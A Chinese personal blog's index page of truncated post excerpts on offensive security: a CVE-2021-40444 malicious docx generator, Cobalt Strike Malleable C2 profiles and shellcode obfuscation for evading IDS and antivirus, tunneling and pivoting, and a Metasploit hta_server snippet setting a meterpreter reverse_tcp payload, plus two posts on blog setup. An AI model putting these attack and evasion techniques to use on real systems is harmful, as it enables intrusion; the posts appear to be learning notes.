Run

前言 恶意 docx 生成器利用 CVE-2021-40444（Microsoft Office Word 远程代码执行） 测试环境 windows 10 Office 2019word kali 简单复现exp方法一、这个需要一个依赖lcab 1apt-get install lcab ...

前言 Cobalt Strike的基础使用 Malleable C2简单的说就是beacon中payload的属性、行为、通过框架修改这些配置文件的属性，可以伪造正常的通信的流量，绕过ids入侵检测防火墙。 profiles配置文件的简单介绍 jitter 控制beacon的不稳定的抖动时间 ...

前言 Cobalt Strike的基础使用 Shellcode混淆免杀 在github逛了一波，找到一个8月20多号的shellcode混淆脚本，不知道什么时候会失效，先记录一下使用方法 预备：python3.x，安装依赖的话就用pip就行 下载地址：https://github.com/if ...

前言 相信不少伙伴在github中搭建了属于自己的博客，我最近看了其他文章学习到一个姿势，就是微信怎么用博客引流，这时看到了OpenWrite 一、OpenWrite设置1、打开https://openwrite.cn/进行注册 2、登陆后，选择增长工具 3、点击添加，填写自己的微信公众号信 ...

前言 当然，这只是简陋的说明一下关于我给大家的主题（theme）怎么使用的方法，具体很多细节，需要大家自己去修改，也许会有许多坑，相信大家一定可以自己填满 一点都不会的话，建议去看看这篇文章试着搭建一个博客再来说 主题使用1、我给大家打压缩包（在文章的最底部有下载链接，我也会想办法上传到githu ...

Cobalt Strike 4.4更新日志cobalt strike4.4于2021 年 8 月 4 日发布 12345678910111213141516171819202122232425262728293031-------------+ 添加对用户定义反射加载器的支持。 https:&# ...

前言 Cobalt Strike基本学习 SSH在隧道里的运行 这里说一下关于我的理解，当用socat将对方的445端口代理到我们的445端口上时，访问我们的445端口，则会通过本地的1080来去访问对方的445端口 根据图片可以了解到，那我们利用1080端口去登陆对方ubuntu的 ...

前言 Cobalt Strike基本学习 隧道使用这里操作更顺滑 直接socks代理 然后本地用proxychains4a代理sock4就行了 接着就可以用proxychains4来扫描该主机的tcp端口 MSF在beacon的使用同样的也可以代理到msf中，可以发送信息和 ...

前言 Cobalt Strike基本学习 自动化横向渗透 我的个人博客 孤桜懶契：http://gylq.gitee.io

hta_server模块使用1234567use exploit/windows/misc/hta_serverset target 1set payload windows/x64/meterpreter/reverse_tcpset S ...